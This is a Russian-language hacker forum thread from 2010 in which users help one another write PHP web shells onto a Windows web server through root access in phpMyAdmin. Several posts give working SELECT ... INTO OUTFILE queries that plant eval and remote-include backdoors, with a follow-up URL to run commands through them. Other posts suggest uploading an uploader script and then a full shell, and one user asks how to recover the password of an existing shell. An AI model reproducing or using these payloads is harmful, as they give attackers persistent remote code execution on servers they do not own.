ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.05.2010, 00:23
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от GOGA075
Такая ситуация:
Есть PhpMyAdin права полный Root
Делаю запрос вида
select '<? @include("http://site.ru/files/shell.txt"); ?>' into outfile 'D:/WWW/files/shell.php';
Создаеться файл .php, но когда захожу на него, там пустой белый лист!!!
А когда делаю запрос
select '<? phpinfo(); ?>' into outfile 'D:/WWW/files/info.php';
выводиться полный phpinfo!!
что может быть не так?
allow_url_include off скорее всего
|
|
|
04.05.2010, 00:24
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
.:[melkiy]:.
Я с табой соглашусь!
Сообщение от [ DSU ]
попробуй залить include($_GET[file]) ...
А по подробнее можно. А то я раньше таким не рользовался! |
|
|
|
04.05.2010, 04:47
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от GOGA075
.:[melkiy]:.
Я с табой соглашусь!
А по подробнее можно. А то я раньше таким не рользовался!
лучше eval($_GET['shell']);
Сообщение от BrainDeaD
я извиняюсь, мой пост затерялся, поетому спрошу ещё раз.
с php вобще ничего не показывает.
возможно. как в этом случае можно глянуть какая функция используется.
там не инклюд, а читалка
|
|
|
|
04.05.2010, 04:59
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
залить скрипт аплоада и через него лить уже обычный шелл
ЗЫ:Не трезв...
|
|
|
|
04.05.2010, 07:25
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
попугай, eval($_GET['shell']); тоже ничего не дал. Ошибки только выдает! типа
Parse error: syntax error, unexpected '<' in D:\WWW\files\files.php(1) : assert code(1) : eval()'d code on line 1
|
|
|
|
04.05.2010, 08:29
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817
Репутация:
1503
|
|
Сообщение от GOGA075
попугай, eval($_GET['shell']); тоже ничего не дал. Ошибки только выдает! типа
Parse error: syntax error, unexpected '<' in D:\WWW\files\files.php(1) : assert code(1) : eval()'d code on line 1
select '<? eval(stripslashes($_REQUEST[\'var\'])); ?>' into outfile 'D:/WWW/files/shell.php';
Потом http://site.com/files/shell.php? var=phpinfo();
__________________
You may say I'm a dreamer
But I'm not the only one
Последний раз редактировалось Twoster; 04.05.2010 в 10:08..
|
|
|
|
04.05.2010, 09:23
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095
Репутация:
34
|
|
Сообщение от shell_c0de
<?php file_get_contents('http://site.ru/<?php eval(stripslashes($_REQUEST[cmd]));?>');?>
Спасибо большое. Но чё то или я туплю или даже хз, но в логах ngnix , но в логах чё то не появляется мой запрос 
|
|
|
|
04.05.2010, 12:09
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Код:
http://www.meningrey.net/%5c/
Что это за уязвимость такая? Где об этом можно почитать? |
|
|
|
04.05.2010, 12:41
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
есть шелл с парольом..
как моjно наыти пароль ?
и пароль изменилось не стандартниы..
напримерь в wso парол root а здес что то друqое ..
как наыти ??
|
|
|
|
04.05.2010, 13:52
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от mailbrush
Код:
http://www.meningrey.net/%5c/
Что это за уязвимость такая? Где об этом можно почитать?
читалка обычная походу.. и mod_rewrite обычный
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?2121152){kind=avatar}
Похожие темы
Линейный вид
